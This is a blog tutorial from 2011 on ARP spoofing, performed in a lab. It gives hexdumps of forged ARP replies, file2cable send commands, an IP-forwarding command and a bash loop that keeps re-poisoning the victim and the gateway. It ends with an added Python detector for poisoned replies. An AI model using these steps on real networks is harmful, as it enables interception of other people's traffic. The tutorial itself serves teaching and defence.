Saturday, October 1, 2011

ARP Spoofing

ARP spoofing, also known as ARP cache poisoning or ARP poison routing (APR), is a technique used to attack a Local Area Network (LAN). It is only effective if there are no layer 2 security controls in place.

Principle of ARP Spoofing
To summarize, ARP spoofing can be used as a man-in-the-middle attack or as a DDoS attack, since it can make the network send traffic to a MAC address that does not exist. The diagram below gives some idea of how it works.

[diagram of the ARP spoofing exchange; image not preserved in this copy]
To give a better understanding of the packets involved, I captured them in my lab; the process consists of several steps and stages.

Stage 1: Collecting Packet information

1) The tool used in this lab is Wireshark; you can download it from the Wireshark download page.
2) After completing the installation, run Wireshark.
3) Configure the interface for capturing packets.
4) As shown on screen, you will need to check "Capture packets in promiscuous mode", which means the interface runs in sniffing mode and accepts frames that are not addressed to it.
5) After completing all the settings, click the Start button and you will see packets being captured.
6) You should see packets like those below; these are the ones of interest for the next step.

Stage 2 : Analysis of the packet

This is a sample of the content of the exported file.

Export the selected packet to /tmp/script/arp.

Edit the file with the following command (hexedit -b /tmp/script/arp).

Info           Bytes                 Remark
Destination    00 50 56 F4 78 89     (GW) @ 192.168.18.2
Target IP      C0 A8 12 02           (GW) @ 192.168.18.2
Source         00 0C 29 F1 EF DB     (Hacker) @ 192.168.18.139
Sender IP      C0 A8 12 8B           (Hacker) @ 192.168.18.139
Victim         00 0C 29 13 80 DD     (Victim) @ 192.168.18.130
Victim IP      C0 A8 12 82           (Victim) @ 192.168.18.130

00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Stage 3: Modify Packet

Start by modifying the victim packet:

1) hexedit -b arp-victim

2) replace the hacker MAC address with the victim MAC address

3) replace the gateway MAC address with the hacker MAC address


Before changing the packet

00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

After changing the packet

00000000  00 0C 29 13  80 DD 00 0C   29 F1 EF DB  08 06 00 01   ..).....).......
00000010  08 00 06 04  00 02 00 0C   29 F1 EF DB  C0 A8 12 02   ........).......
00000020  00 0C 29 13  80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............


Save the file as arp-victim and send it to the victim:

file2cable -v -i eth0 -f arp-victim



Summary (x = field left unchanged)

Field          Before modification     After modification
Ethernet dst   Hacker MAC              Victim MAC
Ethernet src   Gateway MAC             Hacker MAC
EtherType      x                       x
ARP header     x                       x
Sender MAC     Gateway MAC             Hacker MAC
Sender IP      Gateway IP address      Gateway IP address
Target MAC     Hacker MAC              Victim MAC
Target IP      Hacker IP               Victim IP address
Padding        x                       x

Stage 4: Modify Gateway packet

1) cp arp-victim arp-gateway

2) hexedit -b arp-gateway


Before changing the packet

00000000  00 0C 29 13  80 DD 00 0C   29 F1 EF DB  08 06 00 01   ..).....).......
00000010  08 00 06 04  00 02 00 0C   29 F1 EF DB  C0 A8 12 02   ........).......
00000020  00 0C 29 13  80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

After changing the packet

00000000  00 50 56 F4  78 89 00 0C   29 F1 EF DB  08 06 00 01   .PV.x...).......
00000010  08 00 06 04  00 02 00 0C   29 F1 EF DB  C0 A8 12 82   ........).......
00000020  00 50 56 F4  78 89 C0 A8   12 02 00 00  00 00 00 00   .PV.x...........
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Enable IP forwarding on the BackTrack machine:

echo 1 > /proc/sys/net/ipv4/ip_forward

Create the script and make it executable:

nano doarp.sh

chmod 700 doarp.sh

#!/bin/bash
# loop forever, re-sending both crafted frames every 2 seconds
while [ 1 ]; do
    file2cable -i eth0 -f arp-victim
    file2cable -i eth0 -f arp-gateway
    sleep 2
done

Summary (x = field left unchanged)

Field          Before modification     After modification
Ethernet dst   Victim MAC              Gateway MAC
Ethernet src   Hacker MAC              Hacker MAC
EtherType      x                       x
ARP header     x                       x
Sender MAC     Hacker MAC              Hacker MAC
Sender IP      Gateway IP address      Victim IP address
Target MAC     Victim MAC              Gateway MAC
Target IP      Victim IP               Gateway IP
Padding        x                       x
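As an added, defender-side example (not part of the original post), the Python script below decodes the three ARP replies shown in the hexdumps above (the captured gateway reply from Stage 2, the forged reply to the victim from Stage 3, and the forged reply to the gateway from Stage 4) into their Ethernet and ARP fields, then applies the check an ARP monitor such as arpwatch performs: it keeps a trusted IP-to-MAC table seeded from the Stage 2 address table and raises an alert when a reply claims a different MAC for a known IP, or when the Ethernet source MAC and the ARP sender MAC disagree. The frame bytes are transcribed from the page's dumps; the detector class, the trusted table and the function names are my own construction.

```python
"""Decode the ARP replies from the hexdumps above and flag cache poisoning.

Added example for this page, not code from the original post.  The frame
bytes are transcribed from the three hexdumps (captured gateway reply,
forged reply to the victim, forged reply to the gateway).  The trusted
IP->MAC table comes from the Stage 2 address table.  The detector mirrors
the basic arpwatch check: one MAC per IP, alert on any change.
"""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2

# 42 header bytes plus 18 bytes of padding to the 60-byte Ethernet minimum.
PAD = "00" * 18
FRAME_LEGIT = bytes.fromhex(
    "000c29f1efdb 005056f47889 0806"               # eth dst, eth src, type
    "0001 0800 06 04 0002"                         # htype, ptype, hlen, plen, oper
    "005056f47889 c0a81202 000c29f1efdb c0a8128b"  # sha, spa, tha, tpa
    + PAD)
FRAME_TO_VICTIM = bytes.fromhex(
    "000c291380dd 000c29f1efdb 0806"
    "0001 0800 06 04 0002"
    "000c29f1efdb c0a81202 000c291380dd c0a81282" + PAD)
FRAME_TO_GATEWAY = bytes.fromhex(
    "005056f47889 000c29f1efdb 0806"
    "0001 0800 06 04 0002"
    "000c29f1efdb c0a81282 005056f47889 c0a81202" + PAD)

# Legitimate mappings, taken from the Stage 2 address table.
TRUSTED = {
    "192.168.18.2":   "00:50:56:f4:78:89",   # gateway
    "192.168.18.139": "00:0c:29:f1:ef:db",   # attacker's host
    "192.168.18.130": "00:0c:29:13:80:dd",   # victim
}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp_frame(frame: bytes) -> dict:
    """Split an Ethernet II frame carrying IPv4-over-Ethernet ARP into fields."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet/IPv4 ARP is handled")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src), "oper": oper,
        "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
        "target_mac": mac_str(tha), "target_ip": ip_str(tpa),
    }


class ArpPoisonDetector:
    """Keep one MAC per IP; report replies that contradict what is known."""

    def __init__(self, trusted=None):
        self.table = dict(trusted or {})      # ip -> mac

    def inspect(self, frame: bytes) -> list:
        p = parse_arp_frame(frame)
        alerts = []
        # A forged reply may carry an ARP sender MAC that differs from the
        # MAC the frame was actually sent from.
        if p["eth_src"] != p["sender_mac"]:
            alerts.append(f"eth src {p['eth_src']} != ARP sender {p['sender_mac']}")
        if p["oper"] == ARP_REPLY:
            known = self.table.get(p["sender_ip"])
            if known is None:
                self.table[p["sender_ip"]] = p["sender_mac"]   # first sighting
            elif known != p["sender_mac"]:
                alerts.append(f"{p['sender_ip']} changed from {known} "
                              f"to {p['sender_mac']} (possible poisoning)")
        return alerts


def run_detection() -> dict:
    """Feed the three page frames through one detector; return alerts per frame."""
    det = ArpPoisonDetector(TRUSTED)
    return {name: det.inspect(frame) for name, frame in (
        ("legitimate", FRAME_LEGIT),
        ("forged_to_victim", FRAME_TO_VICTIM),
        ("forged_to_gateway", FRAME_TO_GATEWAY))}


if __name__ == "__main__":
    for name, alerts in run_detection().items():
        print(name, "->", alerts or "ok")
```

Run as written, the captured gateway reply passes silently, while both crafted replies trigger a "changed from ... to ..." alert because they claim the attacker's MAC for the gateway's and the victim's IP. On a real segment the trusted table would be learned from traffic or configured statically; the same one-MAC-per-IP rule is what switch features such as dynamic ARP inspection enforce in hardware.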


